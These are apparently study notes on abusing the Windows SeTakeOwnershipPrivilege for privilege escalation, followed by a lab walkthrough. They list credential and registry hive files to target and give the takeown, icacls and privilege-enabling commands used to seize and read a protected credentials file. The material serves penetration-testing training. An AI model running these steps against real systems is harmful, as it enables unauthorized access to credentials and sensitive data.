9 - SeTakeOwnership

# Intro - [SeTakeOwnershipPrivilege](https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/take-ownership-of-files-or-other-objects) grants a user the ability to take ownership of any "securable object," meaning AD objects, NTFS files/folders, printers, registry keys, services, and processes - This privilege assigns [WRITE_OWNER](https://docs.microsoft.com/en-us/windows/win32/secauthz/standard-access-rights) rights over an object, meaning the user can change the owner within the object's security descriptor - Admins are assigned this privilege by default - While a standard user account rarely has this priv, we may encounter a service account that, for example, is tasked with running backup jobs and VSS snapshots with this priv - A service account with `SeTakeOwnership` may also be assigned a few others such as `SeBackup`, `SeRestore`, and `SeSecurity` to control this account's privs at a more granular levelwithout full local admin rights - NOTE: These privs on their own could likely be used to privesc - With the `SeTakeOwnership` priv, a user could take ownership of any file or object and make changes that could involve access to sensitive data, RCE, or DOS - As an example, suppose we encounter a user with the `SeTakeOwnership` priv or assign it to them through an attack such as GPO abuse using [SharpGPOAbuse](https://github.com/FSecureLABS/SharpGPOAbuse) - Continuing with this example, we could use the `SeTakeOwnership` priv to potentially take control of a shared folder or sensitive files such as a document containing passwords or an SSH key # Files of Interest ```cmd c:\inetpub\wwwwroot\web.config %WINDIR%\repair\sam %WINDIR%\repair\system %WINDIR%\repair\software, %WINDIR%\repair\security %WINDIR%\system32\config\SecEvent.Evt %WINDIR%\system32\config\default.sav %WINDIR%\system32\config\security.sav %WINDIR%\system32\config\software.sav %WINDIR%\system32\config\system.sav ``` - Others include `.kdbx` KeePass database files, OneNote notebooks, files such as `passwords.*`, `pass.*`, `creds.*`, scripts, other configuration files, virtual hard drive files, and more # Leveraging `SeTakeOwnershipPrivilege` ## Enable SeTakeOwnershipPrivilege` - First, review the current user's privs ```powershell whoami /priv ``` - Next, if the `SeTakeOwnership` priv is disabled, use this [script](https://raw.githubusercontent.com/fashionproof/EnableAllTokenPrivs/master/EnableAllTokenPrivs.ps1) to enable the priv ```powershell Import-Module .\Enable-Privilege.ps1 .\EnableAllTokenPrivs.ps1 whoami /priv ``` ## Chose a Target File - Next, choose a target file and confirm the current ownership - For this example, we'll target an interesting file found on a file share - Note: It is common to encounter file shares with `Public` and `Private` directories with subdirectories set up by department - Given a user's role in the company, they can often access specific files/directories ```powershell Get-ChildItem -Path 'C:\Department Shares\Private\IT\cred.txt' | Select Fullname,LastWriteTime,Attributes,@{Name="Owner";Expression={ (Get-Acl $_.FullName).Owner }} ``` ## Check Target File's Perms ```powershell cmd /c dir /q 'C:\Department Shares\Private\IT' ``` ## Take Ownership of Target File - Below we leverage the [takeown](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/takeown) Windows binary to change file ownership ```powershell takeown /f 'C:\Department Shares\Private\IT\cred.txt' ``` ## Confirm Ownership Change ```powershell Get-ChildItem -Path 'C:\Department Shares\Private\IT\cred.txt' | select name,directory, @{Name="Owner";Expression={(Get-ACL $_.Fullname).Owner}} ``` ## Modify Target File's ACL - If we still cannot read the file, modify the file ACL using `icacls` to be able to read it ```powershell cat 'C:\Department Shares\Private\IT\cred.txt' icacls 'C:\Department Shares\Private\IT\cred.txt' /grant htb-student:F ``` ## Reading the Target File ```powershell cat 'C:\Department Shares\Private\IT\cred.txt' ``` --- # Exercise - `ping` test ![[images/Pasted image 20260218210033.png]] - same target as previous section so no need to perform an `nmap` scan - `rdp` into target with given creds - inital enum on target ![[images/Pasted image 20260218210252.png]] - `SeTakeOwnership` is currently disabled - find target file ![[images/Pasted image 20260218210333.png]] - enable the `SeTakeOwnership` priv - first move `enable-privilege.ps1` to target - next, upgrade to a powrshell session, import the module, and execute - confirmed that the priv is now enabled ![[images/Pasted image 20260218211206.png]] - enum target file - `C:\Department Shares\Private\IT\cred.txt` ![[images/Pasted image 20260218211247.png]] - take ownership of target file and confirm ![[images/Pasted image 20260218211345.png]] - try to read target file > denied ![[images/Pasted image 20260218211417.png]] - modify ACL for the target file, then read > BOOM! ![[images/Pasted image 20260218211455.png]] - do same for `c:\takeown\flag.txt` ![[images/Pasted image 20260218211835.png]]